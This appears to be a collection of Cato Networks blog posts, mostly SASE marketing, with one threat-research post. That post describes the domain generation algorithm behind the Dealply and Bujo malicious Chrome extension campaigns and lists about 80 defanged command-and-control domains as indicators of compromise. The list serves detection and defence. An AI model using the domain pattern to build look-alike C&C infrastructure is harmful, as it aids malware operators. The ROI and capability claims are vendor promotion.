8 Reasons Enterprises are Adopting SASE Globally SASE (Secure Access Service Edge) is a new enterprise architecture technology that converges all network and security needs, by design. By replacing all point solutions, SASE provides a unified, global and cloud-based network that supports all edges. As a result, SASE solutions improve organizational performance, business agility and connectivity. They also reduce IT overhead. Ever since SASE was coined as a category by Gartner in 2019, the global adoption of SASE has grown significantly. Here are eight drivers and global trends that are driving this change. This blog post is based on the e-book “8 SASE Drivers for Modern Enterprises”. 8 SASE Drivers for Modern Enterprises 1. Enabling the “Branch Office of One” Thanks to mobile devices and constant connectivity, employees can stay connected at all times and work from anywhere. This has turned them into a “branch office of one”, i.e a fully functional business unit, consisting of one person. The remote working trend has been intensified by COVID-19, which has significantly enhanced its adoption. Some form of working from home is probably here to stay. McKinsey found that 52% of employees would prefer a flexible working model even after COVID. Therefore, IT and security teams are adopting SASE solutions to enable these “branches of one” to work seamlessly and securely. SASE optimizes traffic to any edge while continuously inspecting traffic for threats and access control. This ensures all employees anywhere are productive, can access all company assets and can communicate with all employees and partners, at all times. 2. Direct-to-Internet Branch Access Traditional branch offices are also evolving. Many employees have a constant need to communicate with others across the world and to connect to global cloud infrastructures, platforms and applications. So while these employees might be sitting together physically, they are de facto a collection of branch offices of one, with intensive communication and security requirements. IT and security teams are implementing SASE solutions to enable high-performance to the cloud for these employees. SASE provides SD-WAN capabilities and a global private backbone that replaces the costly MPLS and the erratic Internet. [boxlink link="https://www.catonetworks.com/resources/8-sase-drivers-for-modern-enterprises/?utm_source=blog&utm_medium=top_cta&utm_campaign=8_sase_drivers"] 8 SASE Drivers for Modern Enterprises | eBook [/boxlink] 3. Consolidating Vendors The growing number of network and security requirements has flooded the market with vendors and point solutions. IT and security teams are having a difficult time figuring out which platform can answer their exact needs, both now and in the future. In addition, integrating and managing all these solutions creates time-consuming complexities and overhead. SASE is being adopted as a single, user-friendly converged solution for all network and security needs, now and in the future. With a single console for configuration, management and reporting - visibility and management capabilities are improved. In addition, implementing one security solution enables enforcing a single set of policies across the entire network and reducing the attack surface. 4. Adopting Zero Trust Zero trust is a security model in which users are continuously authenticated before they are given access to assets or apps. It is based on the premise of “never trust, always verify”, to ensure the principle of least privilege is enforced and attackers can’t gain access to sensitive assets. Zero trust is essential for securing a global, dispersed workforce that connects remotely and not from the physical, enterprise network. The mindset of IT and security teams is shifting, from securing physical locations to connecting and securing users and devices. Zero trust is deployed as part of SASE as a solution to access needs. By using simple mobile client software or clientless browser access, users connect dynamically to the closest SASE PoP, where their traffic is routed optimally to the data center or application. There, it is authenticated before providing access. Check out the full ebook to view the entire list and four additional SASE drivers. The Future of Enterprise Networks Agile solutions that provide secure, global access with high performance are driving global digital transformation. It is becoming evident, however, that point solutions can't meet all the enterprise needs. These changes are driving the adoption of SASE, a convergence of network and security functions that drives traffic through a global network of local PoPs. With SASE, traffic is sent to the local SASE PoP. Once traffic enters the PoP, SASE applies network and security policies and forwards it over an optimized, global, private backbone. The SASE cloud service takes care of delivering and managing a comprehensive security stack, including upgrades and security updates, for all connected users and cloud resources. The result is optimized, secure and high performing traffic that drives business agility. CATO Networks is Driving SASE Globally Cato pioneered the convergence of networking and security into the cloud. Aligned with Gartner's Secure Access Service Edge (SASE) framework, Cato's vision is to deliver a next generation secure networking architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches based on disjointed point solutions. With Cato, organizations securely and optimally connect any user to any application anywhere on the globe. Our cloud-first architecture enables Cato to rapidly deploy new capabilities and maintain optimum security posture, without any effort from the IT teams. With Cato, your IT organization and your business are ready for whatever comes next. See the ebook “8 SASE Drivers for Modern Enterprises”.    

Making Site Support a Bit Easier. Meet the Diagnostic Toolbox in Your Cato Socket

One of the more frustrating aspects of more users working from home, and remote connectivity in general, is that troubleshooting often requires user involvement at a really bad time. Users are complaining about connection issues, and just when they’re frustrated, you need them to be patient enough to walk through them the troubleshooting steps needed...
Making Site Support a Bit Easier. Meet the Diagnostic Toolbox in Your Cato Socket One of the more frustrating aspects of more users working from home, and remote connectivity in general, is that troubleshooting often requires user involvement at a really bad time. Users are complaining about connection issues, and just when they're frustrated, you need them to be patient enough to walk through them the troubleshooting steps needed to diagnose the problem. Wouldn’t it have been better if you had tools already in place before a problem occurs? Then you could run your testing without involving the user. Well, now you do. We’ve added an IT toolbox to our Cato Socket, Cato’s SD-WAN device. Embedded in the Socket Web UI is a single interface through which network administrators can test and troubleshoot remote connectivity without involving the end-user. Ping, Traceroute, Speedtest, and iPerf are already available, instantly, through a common interface and without any user involvement. [caption id="attachment_23495" align="alignnone" width="1699"] The IT toolbox within the Cato Socket UI provides a range of tools for IT to diagnose last-mile connections from a single web interface[/caption]   [boxlink link="https://www.catonetworks.com/resources/socket-short-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=short_socket_demo"] Cato Demo: From Legacy to SASE in Under 2 Minutes With Cato Sockets [/boxlink] Of course, those are not the only troubleshooting tools provided in Cato SASE Cloud. Cato was built from the philosophy that network troubleshooting is a team sport. While Cato Networks engineers maintain the Cato private backbone for 99.999% uptime, Cato users can manage and run the network themselves. They don’t have to open support tickets for changes they can just as easily address independently. Cato provides the tools for doing just that. Numerous dashboards report on packet loss, latency, jitter, and real-time status help IT diagnose problems once users are connected to Cato. [caption id="attachment_23497" align="alignnone" width="2113"] Cato includes dynamic dashboards reports on last-mile packet loss, latency, jitter, throughput and more for upstream and downstream connections.[/caption]   Our event discovery capability provides any IT team with advanced research and analytics tools to query a data warehouse that we curate and maintain. It organizes more than 100 types of security, connectivity, system, routing, and Socket management events into a single timeline that can be easily queried. Complex queries can be easily built by selecting from the types and sub-types of events to compare the test data being collected via tool access using Socket Web UI against what has previously occurred on that network connection. [caption id="attachment_23499" align="alignnone" width="1920"] With Events, Cato converges networking and security events into a single timeline, simplifying the troubleshooting process.[/caption]   Remote troubleshooting has always been a challenge for IT. With remote offices and more users working from home that challenge will only grow. Having the diagnostic tools in place before problems occur goes a long way to improving IT satisfaction.    

5 Strategic Projects for Strategic CIOs

The role of the CIO has changed dramatically in the past years. Until now, CIOs had been focusing on ongoing IT management. But today, technology creates new business models and helps achieve business goals. This makes technology the defining pillar of business transformation. CIOs who realize this and identify the right opportunities for strategically leveraging...
5 Strategic Projects for Strategic CIOs The role of the CIO has changed dramatically in the past years. Until now, CIOs had been focusing on ongoing IT management. But today, technology creates new business models and helps achieve business goals. This makes technology the defining pillar of business transformation. CIOs who realize this and identify the right opportunities for strategically leveraging technology, can transform their organization. Let’s look at five strategic projects that can help CIOs drive innovation and generate new revenue streams. Project #1: Migrating MPLS or SD-WAN to SASE Many organizations have replaced their MPLS with SD-WAN, or are in the process of doing so. SD-WAN emerged a few decades ago as a cost-effective replacement to MPLS, because it answers MPLS constraints like capacity, cost and lack of flexibility. However, SD-WAN does not provide solutions for modern requirements like security threats, remote work, global performance and cloud-native scalability. SASE (Secure Access Service Edge) is the next step after SD-WAN. A Gartner-coined term, SASE is the convergence of SD-WAN, network security and additional IT capabilities into a global, cloud-native platform. Compared to SD-WAN and other point solutions, SASE ensures reliability, performance, security and connectivity. In fact, according to Gartner’s Hype Cycle of Network Security 2020 - by 2024, more than 60% of SD-WAN customers will have implemented a SASE architecture, compared to approximately 35% in 2020. How CIOs Create Business Value with SASE: By migrating to SASE, CIOs ensure all employees will always be able to connect via a secure, global and performance optimized network. With SASE, CIOs are also relieved from the complexity and risk of supporting the business with point solutions, which are often outdated. Project #2: Building Cloud Native Connectivity Cloud-native infrastructure, platforms and applications provide businesses with flexibility, scalability and customizability. They also increase the speed and efficiency of processes. Technological advancements have enabled this transition, but it is the growing need for remote accessibility and global connectivity that is accelerating it. On-premises solutions can no longer answer modern business needs for performing business activities. SASE is a cloud-native technology, providing businesses with all the benefits of the cloud and connecting all edges, branches, users and data centers. How CIOs Create Business Value with Cloud Native Connectivity By building cloud native connectivity across all edges, CIOs provide employees with optimized performance, security and accessibility to any required internal or external business application. Cloud readiness also enables agile delivery to customers. [boxlink link="https://www.catonetworks.com/resources/deploy-your-site-in-under-6-minutes/?utm_source=blog&utm_medium=top_cta&utm_campaign=6_minute_demo"] Deploy your site in under 6 minutes with Cato SASE Cloud! | Check it out [/boxlink] Project #3: Implementing a Full Security Stack in the Cloud Cyber attacks are becoming increasingly more sophisticated, widespread and with the potential to create more destruction. Coupled with the dissolvement of network borders, IT and security teams need to rethink their security strategy and solutions. Existing point security solutions simply cannot keep up with all these changes. In addition, the overhead tax IT and security teams pay for finding, purchasing, managing, integrating and updating various security solutions from numerous vendors is very high. A converged security solution implements innovative security models, like ZTNA (Zero Trust Network Access) alongside security measures like threat prevention and decryption. In addition, it is automatically updated, to ensure it can thwart CVEs and zero day threats. How CIOs Provide Business Value with Full Stack Cloud Security By implementing a complete security stack in the cloud, CIOs provide the company’s employees and customers with the confidence that their information is secure and accessible only to authorized users and services. In addition, IT and security teams regain peace of mind to operate with confidence and stress free. Project #4: Enable Access to All Edges Working remotely from home, the road or a different office is becoming increasingly popular, and is turning into a working model that is here to stay. In addition, the global distribution of networks has also introduced many new entry points to business systems. But, traditional access capabilities are not designed for these types of connectivity models. SASE provides dynamic and secure access through global PoPs (Points of Presence). Traffic from remote users, data centers, applications or other edges is automatically detected and sent to the nearest PoP. There, it is authorized and then given access. How CIOs Provide Business Value with Global Access to All Edges By providing users with secure access while ensuring first-class citizen performance, CIOs become enablers for business agility and speedy deliveries. The freedom and flexibility to work from anywhere and connect to anywhere power new opportunities for business initiatives. In addition, they provide employees with working conditions fit for modern life and ensure they will not look elsewhere for an employer that enables working remotely. 5. Optimize Routing with Global Connectivity Businesses today route high volumes of traffic, from globally dispersed employees and other edges. Performance optimization is essential for connectivity and communication so employees can get things done. However, the Internet is too erratic to be relied on, and SD-WAN providers are forced to integrate with third party backbone providers for such optimization. SASE solutions provide a global backbone and WAN optimization, serving IT and security capabilities to all users and accelerating east-west and northbound traffic to the cloud. How CIOs Provide Business Value with Optimized Global Connectivity By ensuring low latency and optimized routing, CIOs are fulfilling a key requirement for business agility. From video streaming to accessing information to transferring data, optimized routing facilitates and powers business activities. How to Get Started Looking at this list might be daunting at first. However, all these projects can be achieved through the implementation of SASE. SASE converges network and security point solutions into a single, global, cloud-native platform that enables access from all edges. Therefore, it provides a single and streamlined answer to all network and security needs, now and in the future. Cato is the world’s first SASE platform. Using the Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Start now. You can read more from the following resources: Your First 100 Days as CIO: 5 Steps to Success 5 Things SASE Covers that SD-WAN Doesn’t What is SASE? The Hybrid Workforce: Planning for the New Working Reality    

The DGA Algorithm Used by Dealply and Bujo Campaigns

During a recent malware hunt[1], the Cato research team identified some unique attributes of DGA algorithms that can help security teams automatically spot malware on their network. The “Shimmy” DGA DGAs (Domain Generator Algorithms) are used by attackers to generate a large number of – you guessed it – domains often used for C&C servers....
The DGA Algorithm Used by Dealply and Bujo Campaigns During a recent malware hunt[1], the Cato research team identified some unique attributes of DGA algorithms that can help security teams automatically spot malware on their network. The “Shimmy” DGA DGAs (Domain Generator Algorithms) are used by attackers to generate a large number of – you guessed it – domains often used for C&C servers. Spotting DGAs can be difficult without a clear, searchable pattern. Cato researchers began by collecting traffic metadata from malicious Chrome extensions to their C&C services. Cato maintains a data warehouse built from the metadata of all traffic flows crossing its global private backbone. We analyze those flows for suspicious traffic to hunt threats on a daily basis. The researchers were able to identify the same traffic patterns and network behavior in traffic originating from 80 different malicious Chrome extensions, which were identified as from the Bujo, Dealply and ManageX families of malicious extensions. By examining the C&C domains, researchers observed an algorithm used to create the malicious domains. In many cases, DGAs appear as random characters. In some cases, the domains contain numbers, and in other cases the domains are very long, making them look suspicious. Here are a few examples of the C&C domains (full domain list at the end of this post): qalus.com jurokotu.com bunafo.com naqodur.com womohu.com bosojojo.com mucac.com kuqotaj.com bunupoj.com pocakaqu.com wuqah.com dubocoso.com sanaju.com lufacam.com cajato.com qunadap.com dagaju.com fupoj.com The most obvious trait the domains have in common is that they are all part of “.com” TLD (Top-Level Domain). Also, all the prefixes are five to eight letters long. There are other factors shared by the domains. For one, they all start with consonants and then create a pattern that is built out of consonants and vowels; so that every domain is represented by consonant + vowel + consonant + vowel + consonant, etc. As an example, in jurokotu.com domain, removing the TLD will bring “jurokotu”, and coloring the word to consonants (red) and vowels (blue) will show the pattern: “jurokotu”. From the domains we collected, we could see that the adversaries used the vowels: o, u and a, and consonants: q, m, s, p, r, j, k, l, w, b, c, n, d, f, t, h, and g. Clearly, an algorithm has been used to create these domains and the intention was to make them look as close to real words as possible. [boxlink link="https://www.catonetworks.com/resources/8-ways-sase-answers-your-current-and-future-it-security-needs/?utm_source=blog&utm_medium=top_cta&utm_campaign=8_ways_sase_answers_needs_ebook"] 8 Ways SASE Answers Your Current and Future Security & IT Needs [eBook] [/boxlink] “Shimmy” DGA infrastructure A few additional notable findings are related to the same common infrastructure used by all the C&C domains. All domains are registered using the same registrar - Gal Communication (CommuniGal) Ltd. (GalComm), which was previously associated with registration of malicious domains [2]. The domains are also classified as ‘uncategorized’ by classification engines, another sign that these domains are being used by malware. Trying to access the domains via browser, will either get you a landing page or HTTP ERROR 403 (Forbidden). However, we believe that there are server controls that allow access to the malicious extensions based on specific http headers. All domains are translated to IP addresses belonging to Amazon AWS, part of AS16509. The domains do not share the same IP, and from time to time it seems that the IP for a particular domain is changed dynamically, as can be seen in this example: tawuhoju.com 13.224.161.119 14/04/2021 tawuhoju.com 13.224.161.119 15/04/2021 tawuhoju.com 13.224.161.22 23/04/2021 tawuhoju.com 13.224.161.22 24/04/2021 Wrapping Up Given all this evidence, it’s clear to us that the infrastructure used on these campaigns is leveraging AWS and that it is a very large campaign. We identified many connection points between 80 C&C domains, identifying their DGA and infrastructure. This could be used to identify the C&C communication and infected machines, by analyzing network traffic. Security teams can now use these insights to identify the traffic from malicious Chrome extensions. IOC bacugo[.]com bagoj[.]com baguhoh[.]com bosojojo[.]com bowocofa[.]com buduguh[.]com bujot[.]com bunafo[.]com bunupoj[.]com cagodobo[.]com cajato[.]com copamu[.]com cusupuh[.]com dafucah[.]com dagaju[.]com dapowar[.]com dubahu[.]com dubocoso[.]com dudujutu[.]com focuquc[.]com fogow[.]com fokosul[.]com fupoj[.]com fusog[.]com fuwof[.]com gapaqaw[.]com garuq[.]com gufado[.]com hamohuhu[.]com hodafoc[.]com hoqunuja[.]com huful[.]com jagufu[.]com jurokotu[.]com juwakaha[.]com kocunolu[.]com kogarowa[.]com kohaguk[.]com kuqotaj[.]com kuquc[.]com lohoqoco[.]com loruwo[.]com lufacam[.]com luhatufa[.]com mocujo[.]com moqolan[.]com muqudu[.]com naqodur[.]com nokutu[.]com nopobuq[.]com nopuwa[.]com norugu[.]com nosahof[.]com nuqudop[.]com nusojog[.]com pocakaqu[.]com ponojuju[.]com powuwuqa[.]com pudacasa[.]com pupahaqo[.]com qaloqum[.]com qotun[.]com qufobuh[.]com qunadap[.]com qurajoca[.]com qusonujo[.]com rokuq[.]com ruboja[.]com sanaju[.]com sarolosa[.]com supamajo[.]com tafasajo[.]com tawuhoju[.]com tocopada[.]com tudoq[.]com turasawa[.]com womohu[.]com wujop[.]com wunab[.]com wuqah[.]com References: [1] https://www.catonetworks.com/blog/threat-intelligence-feeds-and-endpoint-protection-systems-fail-to-detect-24-malicious-chrome-extensions/ [2]  https://awakesecurity.com/blog/the-internets-new-arms-dealers-malicious-domain-registrars/    

Cato Networks Response to UK’s NCSC Guidance On Tightening Cyber Control Due to the Situation in Ukraine

Last week the United Kingdom’s National Cyber Security Centre (NCSC) urged UK organizations “to strengthen their cyber resilience in response to the situation in Ukraine” [1] and today they followed that warning up with a call for “organisations in the UK to bolster their online defences” [2] by adopting a set of “Actions to take...
Cato Networks Response to UK’s NCSC Guidance On Tightening Cyber Control Due to the Situation in Ukraine Last week the United Kingdom’s National Cyber Security Centre (NCSC) urged UK organizations “to strengthen their cyber resilience in response to the situation in Ukraine” [1] and today they followed that warning up with a call for “organisations in the UK to bolster their online defences” [2] by adopting a set of “Actions to take when the cyber threat is heightened.”[3] Similar statements have been issued by other authorities such as Germany’s Federal Office for Information Security (BSI) and CISA in the US. As a global provider of the converged network and security solutions known as SASE (Secure Access Service Edge) [4], Cato Networks has a rapidly expanding portfolio of customers not just here in the UK but in many other regions around the world which are also exposed to the current situation. Here are some suggestions for Cato customers who wish to enhance their security posture in accordance with the NCSC’s advice. Step 1 - Lock administrative access down. Cato’s true single-pane-of-glass management console makes it easy for organisations to understand and control exactly who can make changes to their Cato SASE environment. Customers can use the built-in Events Discovery (effectively, your own SIEM running inside Cato) to easily filter for admin users which haven’t recently logged on, and then disable them. Admin user MFA should be enabled across the board and any administrators who don’t make changes (such as auditors) given viewer accounts only. This is also a good opportunity to review API keys and revoke any which are no longer required. Step 2 - Review SDP user account usage. Now is also the right time to review SDP users for stale user accounts which can be disabled or deleted, ensure that directory synchronisation and SCIM groups are appropriately configured and filter all manually created SDP users for unexpected third party users. Customers should also check that any user-specific configuration settings which override global policy are there for good reasons and do not expose the organisation to increased risk. [boxlink link="https://www.catonetworks.com/resources/inside-cato-networks-advanced-security-services/?utm_source=blog&utm_medium=top_cta&utm_campaign=inside_cato_advanced_security_services"] Inside Cato Networks Advanced Security Services | Find Out [/boxlink] Step 3 - Tighten access controls. Cato provides a wide range of access control features including Device Authentication, Device Posture (currently EA), MFA, SSO, operating system blocking and Always-On connectivity policy. Customers should ensure that they are taking advantage of the tight access control capable with Cato by implementing as many of these features as possible and minimising user-based exceptions to the global policy. Step 4 - Implement strong firewalling. As true Next-Generation Firewalls which are both identity-aware and application-aware, Cato’s WAN Firewall and Internet Firewall allow our customers to create fine-grained control over all network traffic across the WAN and to the Internet from all Cato sites and mobile users. The seamless integration of a Secure Web Gateway with the firewalls further increases the degree of control which can be applied to Internet traffic. Both firewalls should be enabled with a final “block all” rule. Customers should also inspect the remaining rules for suitability, and engage Cato Professional Services to assist with a comprehensive firewall review. Step 5 - Start logging everything. One of the main benefits of cloud-based security solutions is that unlike on-premise appliances which are constrained by hardware, the elasticity built into the cloud allows for seamless real-time scaling up of features such as logging. Cato customers can take advantage of our cloud-native elasticity to enable flow-level logging for all traffic across their environment, and then use the built-in SIEM and analytics dashboards to derive real intelligence and perform forensics on real-time and historic data. Step 6 - Enable TLS inspection. Another feature made possible by the cloud is ubiquitous inspection of TLS inspection regardless of source location or destination. Cato SASE automatically detects TLS traffic on non-standard ports and can be controlled by fine-grained policies to avoid disrupting traffic to known good destinations and to comply with local regulations regarding sensitive traffic decryption. Step 7 - Enable Enhanced Threat Protection (IPS, Anti Malware, NG Anti Malware). Even organisations who are not directly in the line of state-sponsored fire are exposed to the usual risk of compromise by ransomware gangs and other actors of economic motivation. Cato’s Enhanced Threat Protection services – IPS, Anti Malware and Next-Gen Anti Malware – are specifically designed to complement the base level firewalls and Secure Web Gateway by inspecting the traffic which is allowed through for suspicious and malicious content. Customers who don’t currently have these features should ask their account management team to enable an immediate trial. Customers with these features should ensure that TLS inspection is enabled and engage Cato Professional Services to ensure that the feature are properly configured and tuned for maximum efficacy. Step 8 – 24x7 Detection and Response. During a recent interview [5] regarding a high-profile hack which occurred on his watch, a CISO stated that “no time is a good time, but these things never come during the middle of the day, during the work week.” Customers without a 24x7 incident response capability should carefully consider their options for being able to detect and respond to threats outside of normal working hours. Cato’s Managed Detection and Response (MDR) service can help customers who are unable to stand up their own 24x7 MDR capability. The NCSC article referred to above includes many other suggestions which are automatically covered by Cato, such as device patching, log retention and configuration backup. The main concern for organisations who already have Cato is to make the best use of what they’ve already got. They no longer need to worry gaps in their security posture, because Cato has those covered out of the box. If you’re not a Cato customer and you’d like to find out more about our solution, or you’re an existing customer who wants to find out more about the additional products and services we provide, let's talk. References: [1] https://twitter.com/NCSC/status/1493256978277228550 [2] https://www.ncsc.gov.uk/news/organisations-urged-to-bolster-defences  [3] https://www.ncsc.gov.uk/guidance/actions-to-take-when-the-cyber-threat-is-heightened [4] https://www.catonetworks.com/sase/sase-according-to-gartner/ [5] https://risky.biz/HF15/  

Pros and Cons of MPLS: Is It Right for Your Network?

MPLS is a reliable routing technique that ensures efficiency and high performance. However, global changes like remote work, mobile connectivity and cloud-based infrastructure require businesses to reconsider their MPLS network strategy. This blog post explains what MPLS is, how it works, MPLS advantages and disadvantages and what to consider next. What is MPLS? MPLS (Multiprotocol...
Pros and Cons of MPLS: Is It Right for Your Network? MPLS is a reliable routing technique that ensures efficiency and high performance. However, global changes like remote work, mobile connectivity and cloud-based infrastructure require businesses to reconsider their MPLS network strategy. This blog post explains what MPLS is, how it works, MPLS advantages and disadvantages and what to consider next. What is MPLS? MPLS (Multiprotocol Label Switching) is a network routing technique that is based on predetermined paths, instead of routers determining the next hop in real-time. This enables quicker and more efficient routing, as the router only needs to view a packet label, instead of looking up the address destination in complex routing tables. In addition, using MPLS requires setting up a dedicated connection. It is de facto a private network. How does MPLS Work? In MPLS, when a data packet enters the network, it is assigned a data label by the first router in the path. The label predetermines the path the packet needs to follow. It includes a value, as well as additional fields to determine the quality of service required, the position of the label in the stack and time-to-live. Based on this label, the packet is routed to the next router in its path. The second router that receives the packet then reads this label and uses it to determine the following hop in the network. It also removes the existing label from the packet and adds a new one. This process is repeated until the data packet reaches its destination. The last router in the path removes the label from the data packet. Since the path is predetermined, the routers only need to read the label and do not need to check the packet’s IP address. This enables faster and more efficient routing. MPLS routing terms: Label Edge Router (LER) - the first or last routers that either assign the first data label and determine the path or pop the label off the packet. The first router is also known as Ingress Label Switching Router (Ingress LSR) and the last as Egress LSR. Label Switching Router (LSR) - the routers along the path that read the labels, switch them and determine the next hop for the packets. Label Switching Path (LSP) - the path the packets are routed through in the network Now let’s look at the advantages and disadvantages of MPLS routing. [boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls?utm_source=blog&utm_medium=top_cta&utm_campaign=wont_tell_you_about_mpls"] What Others Won’t Tell You About MPLS | Find Out [/boxlink] MPLS Advantages & Benefits MPLS provides multiple advantages to network administrators and businesses. These include: Reliability Routing based on labels over a private network ensures that packets will be reliably delivered to their destination. In addition, MPLS enables prioritizing traffic for different types of packets, for example routing real-time, video packets through a lower latency path. This reliability is guaranteed through service level agreements (SLAs), which also ensure the MPLS provider will resolve outages or pay a penalty. High Performance MPLS dedicated infrastructure assures high-quality, low latency and low jitter performance. This ensures efficiency and a good user experience. It is also essential for real-time communication, like voice, video and mission-critical information. MPLS Disadvantages However, there are also disadvantages to MPLS. Expensive MPLS services are expensive, due to their commitment to ensure high bandwidth, high performance and competitive SLAs. Deployments and upgrades of the required private connection can also turn into a resource-intensive process. Rigid MPLS is built for point-to-point connectivity, and not for the cloud. Therefore, the WAN does not have a centralized operations center for reconfiguring locations or deploying new ones and does not enable quick scalability. Does Not Support All Edges MPLS cannot be extended to the cloud since it requires its own dedicated infrastructure. Therefore, it is not a good fit for remote users or for connecting to SaaS applications. Conclusion MPLS is a trustworthy solution for legacy applications in enterprises. However, the transition to the cloud and remote work require businesses to reconsider their network strategy and implement more cost-effective and efficient solutions. Alternatives like SASE (Secure Access Service Edge) combine all the advantages of MPLS, SD-WAN and more. To learn more about SASE and to see how it improves your MPLS connectivity, contact us.    

Total Economic Impact™Study: Cato Delivers 246% ROI and $4.33 Million NPV

Cato Networks was founded with a vision to deliver the next generation of networking and network security through a cloud–native architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches. We aim to rapidly deploy new capabilities and maintain a security posture, without any effort from the IT teams. The question is...
Total Economic Impact™Study: Cato Delivers 246% ROI and $4.33 Million NPV Cato Networks was founded with a vision to deliver the next generation of networking and network security through a cloud–native architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches. We aim to rapidly deploy new capabilities and maintain a security posture, without any effort from the IT teams. The question is - are we living up to our goals? To help us and our potential customers gauge the potential impact and ROI of Cato Networks, we commissioned Forrester Consulting to conduct a Total Economic Impact (TEI) study. To be completely honest, even we were blown away by the success these companies achieved through the Cato SASE Cloud. The study shows how Cato Networks is helping reduce costs, eliminate overhead, retire old systems, enhance security, improve performance and create higher employee morale. Some of the key findings Forrester found, were that by using Cato, a composite organization can enjoy: 246% ROI $4.33 million NPV Payback in less than 6 months $3.8 million saved on reduced operation and maintenance Almost $44,000 saved on reduced time to configure Cato on new sites $2.2 million saved by retiring systems that Cato replaces Reduced time and transit cost Security consistency And more This matters because today organizations are struggling with managing security and network services. They have dedicated teams for VPN, internet and WAN, and more, which need to individually manage updates at each network site. This is time-consuming and costly. In the long run, this prevents the business from transforming digitally, maintaining a competitive advantage and delivering the best services they can to their customers. Let’s dive into some more of these key findings. [boxlink link="https://www.catonetworks.com/resources/the-total-economic-impact-of-cato-networks?utm_source=blog&utm_medium=top_cta&utm_campaign=tei"] The Total Economic Impact™ of Cato Networks | Read The Full Report [/boxlink] Reduced Operation and Maintenance Costs The study revealed that Cato Networks enables saving $3.8 million in reduced operation and maintenance costs over three years. This objective is extremely important for multiple organization stakeholders, as network and security engineers spend a lot of time managing systems instead of optimizing them. “Honestly, I was shocked to see how easy it was to set up and maintain an SD-WAN solution based on the whole Cato dashboard. Now there’s a saying that with [the previous solution], you need 10 engineers to set it up and 20 engineers to keep it running. With Cato, this all went away. It’s in the dashboard. Within the hour, you understand the idea behind it and then you can just do it.” - IT manager, motor vehicle parts manufacturer Reduced Configuration Time With companies scaling and requiring flexibility to connect employees and customers from anywhere, setup and configuration time has become an important consideration when choosing a network and security solution. According to the study, Cato Network saves nearly $44,000 and a huge number of manual hours over three years. “The other thing that we were driving towards was, because we do mergers, because we do a lot of office moves, [because] we go into different geographies, I wanted an ‘office in a box,’ fire- and-forget sort of management plane separation approach where my team could do a lot with just shipping a box out [and] having a reasonably intelligent individual follow a diagram, plug it in, have it light up in a management portal, and we're in business.” - Director of technology, advisory, tax and assurance Savings From Retired Systems Expensive hardware is a huge pain for IT and security teams. It requires maintenance, upgrades, fixes and integrations with other platforms. By migrating to SASE and retiring old systems, organizations can save $2.2 million dollars with Cato, over three years. “We don’t need to go invest in those other solutions because the Cato transport with the intelligence and the security layer does everything we need it to do.” - Director of technology, advisory, tax and assurance Additional Benefits According to the report, Cato Networks also provides additional, unquantifiable benefits, like: Reduced time and transit costs -Saving time and money transporting the equipment to remote sites. Increased security posture - By ensuring the consistency of security rule sets across the organization. Better application performance - Enabling practitioners to get their work done faster. Higher employee morale - According to a director of technology, advisory, tax and assurance: “I know that if I tried to roll it back in my firm, [the employees] would revolt because of the speed it gets. My engineers love it because you ship it, we’ll configure it, it shows up, and we’re off to the races.” Flexibility - The ability to add new mobile users without the need to add infrastructure and to deploy sites quickly. Read the Complete Report You’re welcome to read the complete report to dive deeper into how businesses can digitally transform with Cato Networks. It has all the financial information, more quotes and use cases, and a breakdown of costs and savings to help you gain a more in-depth understanding of Cato Network’s business impact. Read the complete TEI report. To speak with an expert about how you can achieve such ROI in your company, contact us.    

Why Cato Uses MITRE ATT&CK (And Why You Should Too)

As Indicators of Compromise (IoC) and reactive security continue to be the focus of many blue teams, the world is catching on to the fact that adversaries are getting smarter by the minute and IoCs are getting harder to find and less effective to monitor, giving adversaries the upper hand and letting them be one...
Why Cato Uses MITRE ATT&CK (And Why You Should Too) As Indicators of Compromise (IoC) and reactive security continue to be the focus of many blue teams, the world is catching on to the fact that adversaries are getting smarter by the minute and IoCs are getting harder to find and less effective to monitor, giving adversaries the upper hand and letting them be one step ahead. With the traditional IoC-based approach, the assumption is that whenever adversaries use some specific exploit it will generate some specific data. It could be an HTTP request, a domain name, a known malicious IP, and the like. By looking at information from sources such as application logs, network traffic, and HTTP requests enterprises can detect these IoCs and stop adversaries from compromising their networks. In 2020 there were about 18,000 new CVEs reported and in 2021 there were about 20,000, as this trend continues the number of IoCs that are discovered becomes unmanageable and many of them can be modified in small ways to avoid detection. What’s more, as we will show in this blogpost, IoCs are not even the full security picture, representing a small portion of the attacks confronting enterprises. All of which suggests that security professionals need to expand their methods of detecting and stopping attacks. [boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help [eBook] [/boxlink] TTPs: The New Approach to Detecting Attacks The security community has noticed this trend and has started shifting from IoC-based detection to understanding adversaries’ Tactics, Techniques, and Procedures (TTPs). Having identified TTPs, security vendors can then develop the necessary defenses to mitigate risk. Many tools have been developed to help understand and map these TTPs, one such tool is MITRE’s ATT&CK Framework. ATT&CK is a collaborative effort involving many security vendors and researchers. The project aims to map adversary TTPs to help create a common language for both red and blue teams. ATT&CK contains a few different matrices, each with its own sector. In the enterprise matrix, which is focus of our work, there are 14 “tactics.” A “tactic” is a general goal that the adversary is trying to accomplish, under each tactic there are several “techniques.” A “technique” is the means the adversary uses to accomplish his tactic, it is a more technical categorization of what the adversary may do to implement his tactic. Each technique can appear under multiple tactics and can be further divided into sub-techniques. Some tactics can be seen across the network with Reconnaissance, Initial Access, Execution, and Exfiltration associated with the network’s perimeter. To better understand the value of ATT&CK, look at “The Pyramid of Pain,” which shows the relationship between the types of indicators you might use to detect an adversary's activities and how hard it will be for them to change them once caught. TTPs being the hardest to change thus causing more pain to the adversary if detected. [caption id="attachment_22591" align="alignnone" width="2080"] This diagram shows us in a simple manner why aiming to identify TTPs can be more beneficial and improve defenses against adversaries rather than those focusing on IoCs.[/caption] As enterprises shift from reactive and IoC-based security, which heavily relies on processing IoCs from threat intelligence feeds, to TTP-based security, which requires a proactive approach based on research, enterprise security becomes more challenging. At the same time, TTP-based security brings numerous benefits. These include better visibility into one’s security posture, 